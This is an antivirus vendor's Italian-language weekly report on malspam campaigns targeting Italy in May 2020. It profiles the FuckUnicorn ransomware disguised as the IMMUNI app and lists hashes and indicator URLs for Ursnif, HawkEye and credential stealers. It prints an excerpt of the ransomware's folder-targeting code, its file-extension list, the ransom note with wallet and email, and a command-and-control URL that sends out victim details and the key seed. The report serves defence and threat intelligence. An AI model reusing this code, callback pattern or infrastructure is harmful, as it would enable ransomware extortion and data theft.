TG Soft Security Software Specialist - Vir.IT eXplorer: AntiVirus-AntiSpyware-AntiMalware-AntiRansomware
Identifica virus/malwareIdentifica virus polimorfici grazie a DEEP SCANMacro Virus AnalyzerTecnologia INTRUSION DETECTIONTools rimozione virus/malwareInstallazione su Active DirectoryProtezione Real-Time 16/32/64 bitVir.IT Scan MailVir.IT Console Client/ServerVir.IT WebFilter ProtectionAggiornamenti automatici Live-UpdateVir.IT Personal FirewallAssistenza tecnica in lingua italianaCentro Ricerche Anti Malware


Attiva la tua Licenza Invia file sospetto Newsletter

fb rss linkedin twitter

Vir.IT eXplorer PRO dal 2016 Certificato ICSA Labs

Vir.IT eXplorer PRO dal 2016 Certificato VB100

AMTSO

OpsWat

AppEsteem



EICAR Membro SERIT - Security Research in ITaly

25/05/2020 09:18:54 - 2020W21 Report settimanale= > 23-29/05 2K20 campagne MalSpam target Italia

       
week21

Report settimanale delle campagne italiane di malspam a cura del C.R.A.M. di TG Soft.

Di seguito i dettagli delle campagne diffuse in modo massivo nella settimana appena trascorsa dal 23 maggio 2020 al 29 maggio 2020: FuckUnicorn, Ursnif, HawkEye, Ave_Maria, Downloader, MassLogger, PWStealer, 

INDICE

==> FuckUnicorn

==>
25 maggio 2020 => Ursnif, HawkEye, PWStealer

=
=> 26 maggio 2020 => Ursnif, HawkEye, Ave_Maria

==>
 27 maggio 2020 => Ursnif, MassLogger, PWStealer

==> 
28 maggio 2020 => Downloader

==> Consulta le campagne del mese di Maggio

FuckUnicorn

Fonte email: PasteBin

La mail con vari riferimenti al CoronaVirus e all'APP IMMUNI per il contact tracing, invita a cliccare il link: https://www.fofl[.]it/IMMUNI.exe da dove viene scaricato il payload del Ransomware.

Anche dall'icona e dal nome del file si notano i chiari riferimenti all'APP IMMUNI ed al CoronaVirus, di seguito vediamo l'icona e le caratteristiche del file eseguibile:
IMMUNI.exe
MD5: b226803ac5a68cd86ecb7c0c6c4e9d00
Dimensione: 978432 Bytes
VirITTrojan.Win32.FuckUnicorn.A

Analizzando il codice del Ransomware che è stato scritto in linguaggio C# si può subito notare che le estensioni dei file da cifrare sono:

".txt", ".jar", ".exe", ".dat", ".contact", ".settings", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".py", ".sql", ".mdb", ".sln", ".php", ".asp", ".asp", ".html", ".htm", ".xml", ".psd", ".pdf", ".dll", ".c", ".cs", ".mp3", ".mp4", ".f3d", ".dwg", ".cpp", ".zip", ".rar", ".mov", ".rtf", ".bmp", ".mkv", ".avi", ".apk", ".lnk", ".iso", ".7-zip", ".ace,".arj", ".bz2", ".cab", ".gzip", ".lzh", ".tar", ".uue", ".xz", ".z", ".001", ".mpeg", ".mp3", ".mpg", ".core", ".crproj", ".pdb", ".ico", ".pas", ".db", ".torrent"

Ed i file da cifrare vengono cercati ricorsivamente all'interno delle seguenti cartelle come vediamo da un estratto della routine di cifratura:
 
[...]
private string userDir = "C:\\";
private string userName = Environment.UserName;
[...]
string str = "Users\\";
string location = this.userDir + str + this.userName + "\\Desktop";
string location2 = this.userDir + str + this.userName + "\\Links";
string location3 = this.userDir + str + this.userName + "\\Contacts";
string location4 = this.userDir + str + this.userName + "\\Desktop";
string location5 = this.userDir + str + this.userName + "\\Documents";
string location6 = this.userDir + str + this.userName + "\\Downloads";
string location7 = this.userDir + str + this.userName + "\\Pictures";
string location8 = this.userDir + str + this.userName + "\\Music";
string location9 = this.userDir + str + this.userName + "\\OneDrive";
string location10 = this.userDir + str + this.userName + "\\Saved Games";
string location11 = this.userDir + str + this.userName + "\\Favorites";
string location12 = this.userDir + str + this.userName + "\\Searches";
string location13 = this.userDir + str + this.userName + "\\Videos";
[...]
 
Di fatto il Ransomware cifra i file contenuti nella cartella profilo dell'Utente (%userprofile%).

I file una volta cifrati avranno la seguente struttura:
[NOME FILE].[ESTENSIONE ORIGINALE FILE].fuckunicornhtrhrtjrjy

Mentre il Ransomware cifra i file viene mostrata all'utente la seguente schermata di una mappa raffigurante l'infezione del CoronaVirus:

 
In seguito viene creato il file con le istruzioni del riscatto in questa cartella: %userprofile%\Desktop\ con nome "READ_IT.txt" contenente il seguente testo:

 "La lunga serpe sul bastone di Asceplio si è ribellata, ed una nuova era sta per sopraggiungere!",
"Questa è la vostra possibilità per redimervi dopo anni di peccati e soprusi.",
"Sta a voi scegliere. Entro 3 giorni il pegno pagare dovrai o il fuoco di Prometeo cancellerà",
"i vostri dati così come ha cancellato il potere degli Dei sugli uomini.  Il pegno è di solamente 300 euros, da pagare",
"con i Bitcoin al seguente indirizzo : 195naAM74WpLtGHsKp9azSsXWmBCaDscxJ dopo che pagato avrai, ",
"una email mandarci dovrai. xxcte2664@protonmail.com il codice di transazione sarà la prova.",
"Dopo il pegno pagato riceverai la soluzione per spegnere il fuoco di Prometeo. Andare dalla ",
"polizia o chiamare tecnici a niente servirà, nessun essere umano aiutarti potrà."

Il prezzo del riscatto da pagare è di 300 Euro, da versare in cryptovaluta BitCoin al seguente wallet: 195naAM74WpLtGHsKp9azSsXWmBCaDscxJ
In data 29/05/2020 il Wallet risulta vuoto e non ha mai eseguito alcuna transazione sia in ingresso che in uscita.

Viene inoltre modificato lo sfondo del desktop con un'immagine scaricata dal sito di condivisione immagini https://i.imgur[.]com/6bDNKfs.jpg che vediamo di seguito:

Il Ransomware invia una serie di informazioni al suo server di Comando & Controllo con la seguente struttura: http://116.203.210.127/write.php?computer_name=<NOME PC>&userName=<NOME UTENTE>&password=<STRINGA 15 caratteri>&allow=ransom
  • computer_name: Nome del computer colpito
  • userName: Nome utente del computer colpito
  • password: Stringa di 15 caratteri randomici utilizzata per generare la chiave AES (Rijndael) per la cifratura dei file
  • allow: valore costante impostato a "ransom"

Analizzando il payload del Malware si nota che è presente un PDB:
C:\Users\Leonardo\source\repos\ fuckunicorn\fuckunicorn\obj\Release\IMMUNI.pdb


Il malware non utilizza tecniche particolarmente sofisticate e sembra essere ancora in una fase embrionale dello sviluppo.
Vi sono però vari indicatori che fanno ipotizzare che la realizzazione del Ransomware sia svolta da CyberCriminali di nazionalità Italiana presumibilmente alle prime armi.

Per tutti i clienti con Vir.IT eXplorer PRO il Ransomware FuckUnicorn viene intercettato dalla protezione Euristico Comportamentale AntiRansomware protezione CryptoMalware, maggiori dettagli sono disponibili al seguente link: Tecnologie AntiRansomware


IOC:
b226803ac5a68cd86ecb7c0c6c4e9d00

s://www.fofl[.]it/IMMUNI.exe
p://116.203.210[.]127/write.php?[...]
s://i.imgur[.]com/6bDNKfs.jpg

25 maggio 2020

PWStealer


DHL001173980290PDF.exe

MD5: bb279041576c64a18e886f61637185a9
Dimensione: 1594880 Bytes
VirITTrojan.Win32.MSIL5.RBJ

IOC:
bb279041576c64a18e886f61637185a9

HawkEye


Il malware sfrutta i seguenti tool prodotti da NirSoft per l'esfiltrazione dei dati dal computer della vittima:
  • WebBrowserPassView
  • Mail PassView

pagamento.exe

MD5: c8fc12dd29e7e99584b4e753b48bb04d
Dimensione: 608768 Bytes
VirITTrojan.Win32.PSWStealer.CFD

IOC:
c8fc12dd29e7e99584b4e753b48bb04d

Ursnif


pagamento_ID_3071.xls

MD5: 491db56cb71d746712081e4fef026c7c
Dimensione: 95232 Bytes
VirITX97M.Ursnif.CFD

[ PAYLOAD URSNIF ]
MD5931933c26195f6e53c452c657b05c1f7
Dimensione: 253440 Bytes
VirITTrojan.Win32.Ursnif.CFD

Versione: 214139
Gruppo: 5959
Key: 10291029JSJUYNHG

IOC:
491db56cb71d746712081e4fef026c7c
931933c26195f6e53c452c657b05c1f7

p://gstat.echowin[.]com/autorizz0.exe
p://line.xuexiaomi[.]com  

PWStealer

Il malware sfrutta i seguenti tool prodotti da NirSoft per l'esfiltrazione dei dati dal computer della vittima:
  • Mail PassView

Print - 2063622515.js

MD5: d52efb0d830194349983aa6fc3f7c666
Dimensione: 1111701 Bytes
VirITTrojan.JS.Agent.CFD

IOC:
d52efb0d830194349983aa6fc3f7c666

p://lame-mht.duckdns[.]org
p://wshsoft[.]company/mail.jpg 

PWStealer


conferma_dello_scorrimentopdf.exe

MD5: d259446de1df445fc6ddcab050e3f80a
Dimensione: 376832 Bytes
VirITTrojan.Win32.PSWStealer.CFD

IOC:
d259446de1df445fc6ddcab050e3f80a

PWStealer


ORDER01852PDF.exe

MD5: 48d73ca9c862dd513ed7ba1a94398d59
Dimensione: 836608 Bytes
VirITTrojan.Win32.PSWStealer.CFD

IOC:
48d73ca9c862dd513ed7ba1a94398d59


Torna ad inizio pagina
 

26 maggio 2020

Ursnif



 
DHL_Fattura_cash_210579_2_0401.xlsm
MD5: c5af22bdd1bd2a32637ada6ce8b2f02f
Dimensione: 36898 Bytes
VirITX97M.Ursnif.CFG

[ PAYLOAD URSNIF ]
MD5503f619862a12d7fb3b2221eda61ef0a
Dimensione: 720896 Bytes
VirITTrojan.Win32.Ursnif.CFG

Versione: 214139
Gruppo: 4444
Key: 21291029JSJUXMPP

IOC:
c5af22bdd1bd2a32637ada6ce8b2f02f
503f619862a12d7fb3b2221eda61ef0a

p://consulttrus[.]org
s://consaltinger[.]com

Ave_Maria



 
Payment Receipt2020050001.exe
MD5: a64b90eda4e7222d9d1ae9e8df28b4b1
Dimensione: 1145856 Bytes
VirITTrojan.Win32.Avemaria.BV

IOC:
a64b90eda4e7222d9d1ae9e8df28b4b1

HawkEye



 
Il malware sfrutta i seguenti tool prodotti da NirSoft per l'esfiltrazione dei dati dal computer della vittima:
  • WebBrowserPassView
  • Mail PassView
pagamento.exe
MD5: cd713c97872e4bef725c9ef8cda588a4
Dimensione: 907776 Bytes
VirITTrojan.Win32.HawkEye.CFH

IOC:
cd713c97872e4bef725c9ef8cda588a4
 
Torna ad inizio pagina
  

27 maggio 2020

PWStealer



Enumerazione Metalsider - Ordine di febbraio 2020.exe
MD5: d9698ac2d7069a91b406c7fc90959b96
Dimensione: 663552 Bytes
VirITTrojan.Win32.PSWStealer.CFI
IOC:
d9698ac2d7069a91b406c7fc90959b96

MassLogger



 
Scan0000027005200200.pdf.exe
MD529c162011795ff0fc9f76d5c472c6f66
Dimensione: 1263104 Bytes
VirITTrojan.Win32.MassLogger.CFJ

IOC:
29c162011795ff0fc9f76d5c472c6f66

Ursnif



 
bonifico__8156.xls
MD5: d3eeee7a0df0b673fdbd95910056a94c
Dimensione: 92672 Bytes
VirITX97M.Downloader.CFI

[ PAYLOAD URSNIF ]
MD57494b31af8f89f1051c7e9332ff7d331
Dimensione: 167424 Bytes
VirITTrojan.Win32.Ursnif.CFI

Versione: 214139
Gruppo: 7979
Key: 10291029JSJUYNHG

IOC:
d3eeee7a0df0b673fdbd95910056a94c
7494b31af8f89f1051c7e9332ff7d331

p://line.beibiandmom[.]com
p://gstat.ddoborguild[.]com/0n1ine.exe
 
 

28 maggio 2020

Downloader

  

Fattura mancante Nr 0765.exe
MD5: 6035b222b1834532af46d4d01588955f
Dimensione: 196608 Bytes
VirITTrojan.Win32.PSWStealer.CFK

IOC:
6035b222b1834532af46d4d01588955f
 
 
 


Consulta le campagne del mese di Maggio

Vi invitiamo a consultare i report del mese di Aprile/Maggio, per rimanere aggiornati sulle campagne di malspam circolanti in Italia:

16/05/2020 = Report settimanale delle campagne italiane di Malspam dal 16 maggio al 22 maggio 2020
09/05/2020 = Report settimanale delle campagne italiane di Malspam dal 09 maggio al 15 maggio 2020
02/05/2020 = Report settimanale delle campagne italiane di MalSpam dal 02 maggio al 09 maggio 2020

C.R.A.M. 
Centro Ricerche Anti-Malware di TG Soft 

Utilizzabilità delle informative e delle immagine in esse contenute

Ogni informazione pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook a patto che venga sempre e comunque citata la fonte "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" con link cliccabile all'informativa e/o pagina web originale da cui sono stati estrapolati contenuti testuali, spunti e/o immagini. Inoltre per ogni immagine utilizzata dovrà essere sempre indicata la fonte ed il link cliccabile alla pagina originale dell'informativa di prima pubblicazione. Per quanto riguarda le pubblicazioni cartacee sarà necessario citare la fonte esplicitamente "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" ed in analogia alle pubblicata elettroniche i link sotto ad ogni immagine alla pagina web originale da cui sono state estratte.

Sarà gradito nel caso di utilizzo dell'informativa del C.R.A.M. by TG Soft www.tgsoft.it nella relazione di articoli di sintesi il riconoscimento/ringraziamento di seguito "Si ringrazia il Centro Ricerche Anti-Malware C.R.A.M. by TG Soft di cui segnaliamo il link diretto all'informativa originale:[link diretto cliccabile]"

fb rss linkedin twitter
 




Legal & Eula | Privacy | Disinstallazione

TG Soft S.r.l. - via Pitagora 11/b, 35030 Rubàno (PD), ITALIA - C.F. e P.IVA 03296130283